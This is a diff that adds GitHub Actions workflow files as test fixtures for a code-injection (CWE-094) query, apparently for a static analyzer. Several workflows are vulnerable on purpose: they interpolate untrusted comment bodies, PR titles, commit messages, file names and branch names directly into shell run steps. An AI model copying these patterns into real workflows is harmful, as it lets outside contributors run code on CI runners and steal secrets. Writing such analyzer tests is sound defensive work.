000000000000..9992fd8e4cbd --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml @@ -0,0 +1,20 @@ +name: Test + +on: + issue_comment: + types: [created] + +jobs: + test1: + runs-on: ubuntu-22.04 + outputs: + job_output: ${{ steps.source.outputs.value }} + steps: + - id: source + uses: mad9000/actions-find-and-replace-string@3 + with: + source: ${{ github.event['comment']['body'] }} + find: 'foo' + replace: '' + - run: ${{ steps.source.outputs.value }} + - run: ${{ needs.test1.outputs.job_output }} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml new file mode 100644 index 000000000000..94e8be89bdc6 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml @@ -0,0 +1,19 @@ +on: push + +jobs: + simple1: + runs-on: ubuntu-latest + + steps: + - id: summary + uses: mad9000/actions-find-and-replace-string@3 + with: + source: ${{ github.event.head_commit.message }} + find: 'foo' + replace: '' + - id: flow + run: | + echo "${{steps.summary.outputs.value}}" + - id: no-flow + run: | + echo "${{steps.summary.outputs.foo}}" diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml new file mode 100644 index 000000000000..8271f93d857f --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml @@ -0,0 +1,39 @@ +name: CI + +on: [pull_request_target, pull_request] + +jobs: + changed_files: + runs-on: ubuntu-latest + name: Test changed-files + steps: + - uses: actions/checkout@v4 + with: + fetch-depth: 0 + + - name: Get changed files + id: source + uses: tj-actions/changed-files@v40 + + - name: Remove foo from changed files + id: step + uses: mad9000/actions-find-and-replace-string@3 + with: + source: ${{ steps.source.outputs.all_changed_files }} + find: 'foo' + replace: '' + + - name: List all changed files + id: sink + run: | + for file in ${{ steps.step.outputs.value }}; do + echo "$file was changed" + done + + - name: List all changed files + id: no-flow + run: | + for file in ${{ steps.source.outputs.all_changed_files_count }}; do + echo "$file was changed" + done + diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml new file mode 100644 index 000000000000..3128aacc93ce --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml @@ -0,0 +1,23 @@ +on: + workflow_run: + workflows: + - 'prev' + types: + - completed + +permissions: + actions: read + checks: read + contents: write + +jobs: + echo_trigger: + name: Report changes + runs-on: ubuntu-latest + steps: + - name: Echo trigger + run: | + echo "head branch: ${{ github.event.workflow_run.head_branch }}" + cat << EOF + ${{ toJSON(github.event) }} + EOF diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command1.yml new file mode 100644 index 000000000000..adca4bc90ffa --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command1.yml @@ -0,0 +1,21 @@ +name: Test +on: issue_comment +permissions: + issues: write + +jobs: + test: + if: startsWith(github.event.comment.body, '/benchmark') + runs-on: benchmarks + steps: + - name: Check for Command + id: command + uses: xt0rted/slash-command-action@v2 + with: + command: benchmark + reaction-type: "eyes" + repo-token: ${{ env.GH_TOKEN }} + + - run: echo "${{ steps.command.outputs.command-arguments }}" + + diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml new file mode 100644 index 000000000000..5422ac4e9876 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml @@ -0,0 +1,21 @@ +name: Test +on: issue_comment +permissions: + issues: write + +jobs: + test: + if: startsWith(github.event.comment.body, '/benchmark') + runs-on: benchmarks + steps: + - name: Check for Command + id: command + uses: xt0rted/slash-command-action@v2 + with: + command: benchmark + reaction-type: "eyes" + repo-token: ${{ env.GH_TOKEN }} + permission-level: read + + - run: echo "${{ steps.command.outputs.command-arguments }}" + diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/sonar-source.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/sonar-source.yml new file mode 100644 index 000000000000..7dc735dd6bcc --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/sonar-source.yml @@ -0,0 +1,71 @@ +name: Sonar Code Coverage Upload +on: + workflow_run: + workflows: ["Build/Test"] + types: [completed] +jobs: + sonar: + name: Sonar + runs-on: ubuntu-latest + if: github.event.workflow_run.conclusion == 'success' + steps: + - uses: actions/checkout@v4 + with: + repository: ${{ github.event.workflow_run.head_repository.full_name }} + ref: ${{ github.event.workflow_run.head_branch }} + fetch-depth: 0 + - name: 'Download code coverage' + uses: actions/github-script@v7 + with: + script: | + let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => { + return artifact.name == "oc-code-coverage" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + let fs = require('fs'); + fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/oc-code-coverage.zip`, Buffer.from(download.data)); + - name: 'Unzip code coverage' + run: unzip oc-code-coverage.zip -d coverage + - name: set env vars + run: | + echo "SONAR_PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV + echo "SONAR_BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV + echo "SONAR_HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV + # on develop branch, only run a baseline scan + - name: SonarCloud Scan (Baseline) + uses: sonarsource/sonarcloud-github-action@master + if: env.SONAR_HEAD == 'develop' + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} + with: + args: > + -Dsonar.scm.revision=${{ github.event.workflow_run.head_sha }} + -Dsonar.projectKey=opencost_opencost + -Dsonar.organization=opencost + -Dsonar.branch.name=develop + -Dsonar.branch.target=develop + - name: SonarCloud Scan (PR) + uses: sonarsource/sonarcloud-github-action@master + if: env.SONAR_HEAD != 'develop' + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} + with: + args: > + -Dsonar.scm.revision=${{ github.event.workflow_run.head_sha }} + -Dsonar.pullrequest.key=${{ env.SONAR_PR_NUM }} + -Dsonar.pullrequest.branch=${{ env.SONAR_HEAD }} + -Dsonar.pullrequest.base=${{ env.SONAR_BASE }} + -Dsonar.projectKey=opencost_opencost + -Dsonar.organization=opencost diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml new file mode 100644 index 000000000000..5aeb9aac7c52 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml @@ -0,0 +1,52 @@ +on: + pull_request_target: + +permissions: + actions: write + +jobs: + job1: + runs-on: ubuntu-latest + outputs: + job_output: ${{ steps.step5.outputs.MSG5 }} + + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + - id: step0 + uses: mad9000/actions-find-and-replace-string@3 + with: + source: ${{ github.event['pull_request']['body'] }} + find: 'foo' + replace: '' + - id: step1 + env: + BODY: ${{ steps.step0.outputs.value}} + run: echo "::set-output name=MSG::${BODY}" + - id: step2 + env: + MSG: ${{steps.step1.outputs.MSG}} + run: echo "MSG2=$MSG" >> "$GITHUB_OUTPUT" + - id: step3 + env: + MSG2: ${{steps.step2.outputs.MSG2}} + run: echo "MSG3=$MSG2" >> "${GITHUB_OUTPUT}" + - id: step4 + env: + MSG3: ${{steps.step3.outputs.MSG3}} + run: echo "MSG4=$MSG3" >> ${GITHUB_OUTPUT} + - id: step5 + env: + MSG4: ${{steps.step4.outputs.MSG4}} + run: echo "MSG5=$MSG4" >> $GITHUB_OUTPUT + + job2: + runs-on: ubuntu-latest + + if: ${{ always() }} + + needs: job1 + + steps: + - run: echo ${{needs.job1.outputs['job_output']}} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml new file mode 100644 index 000000000000..d149df2bd7ca --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml @@ -0,0 +1,29 @@ +name: Pull Request Open + +on: + pull_request_target: + branches: + - main + - 14.0.x + + types: + - opened + - reopened + +jobs: + updateJira: + if: github.actor != 'dependabot[bot]' + runs-on: ubuntu-latest + steps: + - name: Checkout repository + uses: actions/checkout@v4 + + - name: Extract Jira Key + env: + TITLE: ${{ github.event.pull_request.title }} + run: echo ISSUE_KEY=$(echo "$TITLE") >> $GITHUB_ENV + + - name: Sink + run: echo ${{ env.ISSUE_KEY }} + + diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml new file mode 100644 index 000000000000..1bc02ccd826e --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml @@ -0,0 +1,568 @@ +name: Self-hosted runner (push) + +on: + workflow_run: + workflows: ["Self-hosted runner (push-caller)"] + branches: ["main"] + types: [completed] + push: + branches: + - ci_* + - ci-* + paths: + - "src/**" + - "tests/**" + - ".github/**" + - "templates/**" + - "utils/**" + repository_dispatch: + +env: + HF_HOME: /mnt/cache + TRANSFORMERS_IS_CI: yes + OMP_NUM_THREADS: 8 + MKL_NUM_THREADS: 8 + PYTEST_TIMEOUT: 60 + TF_FORCE_GPU_ALLOW_GROWTH: true + RUN_PT_TF_CROSS_TESTS: 1 + CUDA_VISIBLE_DEVICES: 0,1 + +jobs: + setup: + name: Setup + strategy: + matrix: + machine_type: [single-gpu, multi-gpu] + runs-on: ['${{ matrix.machine_type }}', nvidia-gpu, t4, push-ci] + container: + image: huggingface/transformers-all-latest-gpu-push-ci + options: --gpus 0 --shm-size "16gb" --ipc host -v /mnt/cache/.cache/huggingface:/mnt/cache/ + outputs: + matrix: ${{ steps.set-matrix.outputs.matrix }} + test_map: ${{ steps.set-matrix.outputs.test_map }} + steps: + # Necessary to get the correct branch name and commit SHA for `workflow_run` event + # We also take into account the `push` event (we might want to test some changes in a branch) + - name: Prepare custom environment variables + shell: bash + # `CI_BRANCH_PUSH`: The branch name from the push event + # `CI_BRANCH_WORKFLOW_RUN`: The name of the branch on which this workflow is triggered by `workflow_run` event + # `CI_BRANCH`: The non-empty branch name from the above two (one and only one of them is empty) + # `CI_SHA_PUSH`: The commit SHA from the push event + # `CI_SHA_WORKFLOW_RUN`: The commit SHA that triggers this workflow by `workflow_run` event + # `CI_SHA`: The non-empty commit SHA from the above two (one and only one of them is empty) + run: | + CI_BRANCH_PUSH=${{ github.event.ref }} + CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_SHA_PUSH=${{ github.event.head_commit.id }} + CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} + echo $CI_BRANCH_PUSH + echo $CI_BRANCH_WORKFLOW_RUN + echo $CI_SHA_PUSH + echo $CI_SHA_WORKFLOW_RUN + [[ ! -z "$CI_BRANCH_PUSH" ]] && echo "CI_BRANCH=$CI_BRANCH_PUSH" >> $GITHUB_ENV || echo "CI_BRANCH=$CI_BRANCH_WORKFLOW_RUN" >> $GITHUB_ENV + [[ ! -z "$CI_SHA_PUSH" ]] && echo "CI_SHA=$CI_SHA_PUSH" >> $GITHUB_ENV || echo "CI_SHA=$CI_SHA_WORKFLOW_RUN" >> $GITHUB_ENV + + - name: print environment variables + run: | + echo "env.CI_BRANCH = ${{ env.CI_BRANCH }}" + echo "env.CI_SHA = ${{ env.CI_SHA }}" + + - name: Update clone using environment variables + working-directory: /transformers + run: | + echo "original branch = $(git branch --show-current)" + git fetch && git checkout ${{ env.CI_BRANCH }} + echo "updated branch = $(git branch --show-current)" + git checkout ${{ env.CI_SHA }} + echo "log = $(git log -n 1)" + + - name: Cleanup + working-directory: /transformers + run: | + rm -rf tests/__pycache__ + rm -rf tests/models/__pycache__ + rm -rf reports + + - name: Show installed libraries and their versions + working-directory: /transformers + run: pip freeze + + - name: Fetch the tests to run + working-directory: /transformers + # TODO: add `git-python` in the docker images + run: | + pip install --upgrade git-python + python3 utils/tests_fetcher.py --diff_with_last_commit | tee test_preparation.txt + + - name: Report fetched tests + uses: actions/upload-artifact@v4 + with: + name: test_fetched + path: /transformers/test_preparation.txt + + - id: set-matrix + name: Organize tests into models + working-directory: /transformers + # The `keys` is used as GitHub actions matrix for jobs, i.e. `models/bert`, `tokenization`, `pipeline`, etc. + # The `test_map` is used to get the actual identified test files under each key. + # If no test to run (so no `test_map.json` file), create a dummy map (empty matrix will fail) + run: | + if [ -f test_map.json ]; then + keys=$(python3 -c 'import json; fp = open("test_map.json"); test_map = json.load(fp); fp.close(); d = list(test_map.keys()); print(d)') + test_map=$(python3 -c 'import json; fp = open("test_map.json"); test_map = json.load(fp); fp.close(); print(test_map)') + else + keys=$(python3 -c 'keys = ["dummy"]; print(keys)') + test_map=$(python3 -c 'test_map = {"dummy": []}; print(test_map)') + fi + echo $keys + echo $test_map + echo "matrix=$keys" >> $GITHUB_OUTPUT + echo "test_map=$test_map" >> $GITHUB_OUTPUT + + run_tests_single_gpu: + name: Model tests + needs: setup + # `dummy` means there is no test to run + if: contains(fromJson(needs.setup.outputs.matrix), 'dummy') != true + strategy: + fail-fast: false + matrix: + folders: ${{ fromJson(needs.setup.outputs.matrix) }} + machine_type: [single-gpu] + runs-on: ['${{ matrix.machine_type }}', nvidia-gpu, t4, push-ci] + container: + image: huggingface/transformers-all-latest-gpu-push-ci + options: --gpus 0 --shm-size "16gb" --ipc host -v /mnt/cache/.cache/huggingface:/mnt/cache/ + steps: + # Necessary to get the correct branch name and commit SHA for `workflow_run` event + # We also take into account the `push` event (we might want to test some changes in a branch) + - name: Prepare custom environment variables + shell: bash + # For the meaning of these environment variables, see the job `Setup` + run: | + CI_BRANCH_PUSH=${{ github.event.ref }} + CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_SHA_PUSH=${{ github.event.head_commit.id }} + CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} + echo $CI_BRANCH_PUSH + echo $CI_BRANCH_WORKFLOW_RUN + echo $CI_SHA_PUSH + echo $CI_SHA_WORKFLOW_RUN + [[ ! -z "$CI_BRANCH_PUSH" ]] && echo "CI_BRANCH=$CI_BRANCH_PUSH" >> $GITHUB_ENV || echo "CI_BRANCH=$CI_BRANCH_WORKFLOW_RUN" >> $GITHUB_ENV + [[ ! -z "$CI_SHA_PUSH" ]] && echo "CI_SHA=$CI_SHA_PUSH" >> $GITHUB_ENV || echo "CI_SHA=$CI_SHA_WORKFLOW_RUN" >> $GITHUB_ENV + + - name: print environment variables + run: | + echo "env.CI_BRANCH = ${{ env.CI_BRANCH }}" + echo "env.CI_SHA = ${{ env.CI_SHA }}" + + - name: Update clone using environment variables + working-directory: /transformers + run: | + echo "original branch = $(git branch --show-current)" + git fetch && git checkout ${{ env.CI_BRANCH }} + echo "updated branch = $(git branch --show-current)" + git checkout ${{ env.CI_SHA }} + echo "log = $(git log -n 1)" + + - name: Reinstall transformers in edit mode (remove the one installed during docker image build) + working-directory: /transformers + run: python3 -m pip uninstall -y transformers && python3 -m pip install -e . + + - name: Echo folder ${{ matrix.folders }} + shell: bash + # For folders like `models/bert`, set an env. var. (`matrix_folders`) to `models_bert`, which will be used to + # set the artifact folder names (because the character `/` is not allowed). + run: | + echo "${{ matrix.folders }}" + echo "${{ fromJson(needs.setup.outputs.test_map)[matrix.folders] }}" + matrix_folders=${{ matrix.folders }} + matrix_folders=${matrix_folders/'models/'/'models_'} + echo "$matrix_folders" + echo "matrix_folders=$matrix_folders" >> $GITHUB_ENV + + - name: NVIDIA-SMI + run: | + nvidia-smi + + - name: Environment + working-directory: /transformers + run: | + python3 utils/print_env.py + + - name: Show installed libraries and their versions + working-directory: /transformers + run: pip freeze + + - name: Run all non-slow selected tests on GPU + working-directory: /transformers + run: | + python3 -m pytest -n 2 --dist=loadfile -v --make-reports=${{ matrix.machine_type }}_tests_gpu_${{ matrix.folders }} ${{ fromJson(needs.setup.outputs.test_map)[matrix.folders] }} + + - name: Failure short reports + if: ${{ failure() }} + continue-on-error: true + run: cat /transformers/reports/${{ matrix.machine_type }}_tests_gpu_${{ matrix.folders }}/failures_short.txt + + - name: "Test suite reports artifacts: ${{ matrix.machine_type }}_run_all_tests_gpu_${{ env.matrix_folders }}_test_reports" + if: ${{ always() }} + uses: actions/upload-artifact@v4 + with: + name: ${{ matrix.machine_type }}_run_all_tests_gpu_${{ env.matrix_folders }}_test_reports + path: /transformers/reports/${{ matrix.machine_type }}_tests_gpu_${{ matrix.folders }} + + run_tests_multi_gpu: + name: Model tests + needs: setup + # `dummy` means there is no test to run + if: contains(fromJson(needs.setup.outputs.matrix), 'dummy') != true + strategy: + fail-fast: false + matrix: + folders: ${{ fromJson(needs.setup.outputs.matrix) }} + machine_type: [multi-gpu] + runs-on: ['${{ matrix.machine_type }}', nvidia-gpu, t4, push-ci] + container: + image: huggingface/transformers-all-latest-gpu-push-ci + options: --gpus all --shm-size "16gb" --ipc host -v /mnt/cache/.cache/huggingface:/mnt/cache/ + steps: + # Necessary to get the correct branch name and commit SHA for `workflow_run` event + # We also take into account the `push` event (we might want to test some changes in a branch) + - name: Prepare custom environment variables + shell: bash + # For the meaning of these environment variables, see the job `Setup` + run: | + CI_BRANCH_PUSH=${{ github.event.ref }} + CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_SHA_PUSH=${{ github.event.head_commit.id }} + CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} + echo $CI_BRANCH_PUSH + echo $CI_BRANCH_WORKFLOW_RUN + echo $CI_SHA_PUSH + echo $CI_SHA_WORKFLOW_RUN + [[ ! -z "$CI_BRANCH_PUSH" ]] && echo "CI_BRANCH=$CI_BRANCH_PUSH" >> $GITHUB_ENV || echo "CI_BRANCH=$CI_BRANCH_WORKFLOW_RUN" >> $GITHUB_ENV + [[ ! -z "$CI_SHA_PUSH" ]] && echo "CI_SHA=$CI_SHA_PUSH" >> $GITHUB_ENV || echo "CI_SHA=$CI_SHA_WORKFLOW_RUN" >> $GITHUB_ENV + + - name: print environment variables + run: | + echo "env.CI_BRANCH = ${{ env.CI_BRANCH }}" + echo "env.CI_SHA = ${{ env.CI_SHA }}" + + - name: Update clone using environment variables + working-directory: /transformers + run: | + echo "original branch = $(git branch --show-current)" + git fetch && git checkout ${{ env.CI_BRANCH }} + echo "updated branch = $(git branch --show-current)" + git checkout ${{ env.CI_SHA }} + echo "log = $(git log -n 1)" + + - name: Reinstall transformers in edit mode (remove the one installed during docker image build) + working-directory: /transformers + run: python3 -m pip uninstall -y transformers && python3 -m pip install -e . + + - name: Echo folder ${{ matrix.folders }} + shell: bash + # For folders like `models/bert`, set an env. var. (`matrix_folders`) to `models_bert`, which will be used to + # set the artifact folder names (because the character `/` is not allowed). + run: | + echo "${{ matrix.folders }}" + echo "${{ fromJson(needs.setup.outputs.test_map)[matrix.folders] }}" + matrix_folders=${{ matrix.folders }} + matrix_folders=${matrix_folders/'models/'/'models_'} + echo "$matrix_folders" + echo "matrix_folders=$matrix_folders" >> $GITHUB_ENV + + - name: NVIDIA-SMI + run: | + nvidia-smi + + - name: Environment + working-directory: /transformers + run: | + python3 utils/print_env.py + + - name: Show installed libraries and their versions + working-directory: /transformers + run: pip freeze + + - name: Run all non-slow selected tests on GPU + env: + MKL_SERVICE_FORCE_INTEL: 1 + working-directory: /transformers + run: | + python3 -m pytest -n 2 --dist=loadfile -v --make-reports=${{ matrix.machine_type }}_tests_gpu_${{ matrix.folders }} ${{ fromJson(needs.setup.outputs.test_map)[matrix.folders] }} + + - name: Failure short reports + if: ${{ failure() }} + continue-on-error: true + run: cat /transformers/reports/${{ matrix.machine_type }}_tests_gpu_${{ matrix.folders }}/failures_short.txt + + - name: "Test suite reports artifacts: ${{ matrix.machine_type }}_run_all_tests_gpu_${{ env.matrix_folders }}_test_reports" + if: ${{ always() }} + uses: actions/upload-artifact@v4 + with: + name: ${{ matrix.machine_type }}_run_all_tests_gpu_${{ env.matrix_folders }}_test_reports + path: /transformers/reports/${{ matrix.machine_type }}_tests_gpu_${{ matrix.folders }} + + run_tests_torch_cuda_extensions_single_gpu: + name: Torch CUDA extension tests + needs: setup + if: contains(fromJson(needs.setup.outputs.matrix), 'deepspeed') || contains(fromJson(needs.setup.outputs.matrix), 'extended') + strategy: + fail-fast: false + matrix: + machine_type: [single-gpu] + runs-on: ['${{ matrix.machine_type }}', nvidia-gpu, t4, push-ci] + container: + image: huggingface/transformers-pytorch-deepspeed-latest-gpu-push-ci + options: --gpus 0 --shm-size "16gb" --ipc host -v /mnt/cache/.cache/huggingface:/mnt/cache/ + steps: + # Necessary to get the correct branch name and commit SHA for `workflow_run` event + # We also take into account the `push` event (we might want to test some changes in a branch) + - name: Prepare custom environment variables + shell: bash + # For the meaning of these environment variables, see the job `Setup` + run: | + CI_BRANCH_PUSH=${{ github.event.ref }} + CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_SHA_PUSH=${{ github.event.head_commit.id }} + CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} + echo $CI_BRANCH_PUSH + echo $CI_BRANCH_WORKFLOW_RUN + echo $CI_SHA_PUSH + echo $CI_SHA_WORKFLOW_RUN + [[ ! -z "$CI_BRANCH_PUSH" ]] && echo "CI_BRANCH=$CI_BRANCH_PUSH" >> $GITHUB_ENV || echo "CI_BRANCH=$CI_BRANCH_WORKFLOW_RUN" >> $GITHUB_ENV + [[ ! -z "$CI_SHA_PUSH" ]] && echo "CI_SHA=$CI_SHA_PUSH" >> $GITHUB_ENV || echo "CI_SHA=$CI_SHA_WORKFLOW_RUN" >> $GITHUB_ENV + + - name: print environment variables + run: | + echo "env.CI_BRANCH = ${{ env.CI_BRANCH }}" + echo "env.CI_SHA = ${{ env.CI_SHA }}" + + - name: Update clone using environment variables + working-directory: /workspace/transformers + run: | + echo "original branch = $(git branch --show-current)" + git fetch && git checkout ${{ env.CI_BRANCH }} + echo "updated branch = $(git branch --show-current)" + git checkout ${{ env.CI_SHA }} + echo "log = $(git log -n 1)" + + - name: Reinstall transformers in edit mode (remove the one installed during docker image build) + working-directory: /workspace/transformers + run: python3 -m pip uninstall -y transformers && python3 -m pip install -e . + + - name: Remove cached torch extensions + run: rm -rf /github/home/.cache/torch_extensions/ + + # To avoid unknown test failures + - name: Pre build DeepSpeed *again* + working-directory: /workspace + run: | + python3 -m pip uninstall -y deepspeed + DS_BUILD_CPU_ADAM=1 DS_BUILD_FUSED_ADAM=1 python3 -m pip install deepspeed --global-option="build_ext" --global-option="-j8" --no-cache -v --disable-pip-version-check + + - name: NVIDIA-SMI + run: | + nvidia-smi + + - name: Environment + working-directory: /workspace/transformers + run: | + python utils/print_env.py + + - name: Show installed libraries and their versions + working-directory: /workspace/transformers + run: pip freeze + + - name: Run all non-slow selected tests on GPU + working-directory: /workspace/transformers + # TODO: Here we pass all tests in the 2 folders for simplicity. It's better to pass only the identified tests. + run: | + python -m pytest -n 1 --dist=loadfile -v --make-reports=${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports tests/deepspeed tests/extended + + - name: Failure short reports + if: ${{ failure() }} + continue-on-error: true + run: cat /workspace/transformers/reports/${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports/failures_short.txt + + - name: "Test suite reports artifacts: ${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports" + if: ${{ always() }} + uses: actions/upload-artifact@v4 + with: + name: ${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports + path: /workspace/transformers/reports/${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports + + run_tests_torch_cuda_extensions_multi_gpu: + name: Torch CUDA extension tests + needs: setup + if: contains(fromJson(needs.setup.outputs.matrix), 'deepspeed') || contains(fromJson(needs.setup.outputs.matrix), 'extended') + strategy: + fail-fast: false + matrix: + machine_type: [multi-gpu] + runs-on: ['${{ matrix.machine_type }}', nvidia-gpu, t4, push-ci] + container: + image: huggingface/transformers-pytorch-deepspeed-latest-gpu-push-ci + options: --gpus all --shm-size "16gb" --ipc host -v /mnt/cache/.cache/huggingface:/mnt/cache/ + steps: + # Necessary to get the correct branch name and commit SHA for `workflow_run` event + # We also take into account the `push` event (we might want to test some changes in a branch) + - name: Prepare custom environment variables + shell: bash + # For the meaning of these environment variables, see the job `Setup` + run: | + CI_BRANCH_PUSH=${{ github.event.ref }} + CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_SHA_PUSH=${{ github.event.head_commit.id }} + CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} + echo $CI_BRANCH_PUSH + echo $CI_BRANCH_WORKFLOW_RUN + echo $CI_SHA_PUSH + echo $CI_SHA_WORKFLOW_RUN + [[ ! -z "$CI_BRANCH_PUSH" ]] && echo "CI_BRANCH=$CI_BRANCH_PUSH" >> $GITHUB_ENV || echo "CI_BRANCH=$CI_BRANCH_WORKFLOW_RUN" >> $GITHUB_ENV + [[ ! -z "$CI_SHA_PUSH" ]] && echo "CI_SHA=$CI_SHA_PUSH" >> $GITHUB_ENV || echo "CI_SHA=$CI_SHA_WORKFLOW_RUN" >> $GITHUB_ENV + + - name: print environment variables + run: | + echo "env.CI_BRANCH = ${{ env.CI_BRANCH }}" + echo "env.CI_SHA = ${{ env.CI_SHA }}" + + - name: Update clone using environment variables + working-directory: /workspace/transformers + run: | + echo "original branch = $(git branch --show-current)" + git fetch && git checkout ${{ env.CI_BRANCH }} + echo "updated branch = $(git branch --show-current)" + git checkout ${{ env.CI_SHA }} + echo "log = $(git log -n 1)" + + - name: Reinstall transformers in edit mode (remove the one installed during docker image build) + working-directory: /workspace/transformers + run: python3 -m pip uninstall -y transformers && python3 -m pip install -e . + + - name: Remove cached torch extensions + run: rm -rf /github/home/.cache/torch_extensions/ + + # To avoid unknown test failures + - name: Pre build DeepSpeed *again* + working-directory: /workspace + run: | + python3 -m pip uninstall -y deepspeed + DS_BUILD_CPU_ADAM=1 DS_BUILD_FUSED_ADAM=1 python3 -m pip install deepspeed --global-option="build_ext" --global-option="-j8" --no-cache -v --disable-pip-version-check + + - name: NVIDIA-SMI + run: | + nvidia-smi + + - name: Environment + working-directory: /workspace/transformers + run: | + python utils/print_env.py + + - name: Show installed libraries and their versions + working-directory: /workspace/transformers + run: pip freeze + + - name: Run all non-slow selected tests on GPU + working-directory: /workspace/transformers + # TODO: Here we pass all tests in the 2 folders for simplicity. It's better to pass only the identified tests. + run: | + python -m pytest -n 1 --dist=loadfile -v --make-reports=${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports tests/deepspeed tests/extended + + - name: Failure short reports + if: ${{ failure() }} + continue-on-error: true + run: cat /workspace/transformers/reports/${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports/failures_short.txt + + - name: "Test suite reports artifacts: ${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports" + if: ${{ always() }} + uses: actions/upload-artifact@v4 + with: + name: ${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports + path: /workspace/transformers/reports/${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports + + send_results: + name: Send results to webhook + runs-on: ubuntu-22.04 + if: always() + needs: [ + setup, + run_tests_single_gpu, + run_tests_multi_gpu, + run_tests_torch_cuda_extensions_single_gpu, + run_tests_torch_cuda_extensions_multi_gpu + ] + steps: + - name: Preliminary job status + shell: bash + # For the meaning of these environment variables, see the job `Setup` + run: | + echo "Setup status: ${{ needs.setup.result }}" + + # Necessary to get the correct branch name and commit SHA for `workflow_run` event + # We also take into account the `push` event (we might want to test some changes in a branch) + - name: Prepare custom environment variables + shell: bash + # For the meaning of these environment variables, see the job `Setup` + run: | + CI_BRANCH_PUSH=${{ github.event.ref }} + CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_SHA_PUSH=${{ github.event.head_commit.id }} + CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} + echo $CI_BRANCH_PUSH + echo $CI_BRANCH_WORKFLOW_RUN + echo $CI_SHA_PUSH + echo $CI_SHA_WORKFLOW_RUN + [[ ! -z "$CI_BRANCH_PUSH" ]] && echo "CI_BRANCH=$CI_BRANCH_PUSH" >> $GITHUB_ENV || echo "CI_BRANCH=$CI_BRANCH_WORKFLOW_RUN" >> $GITHUB_ENV + [[ ! -z 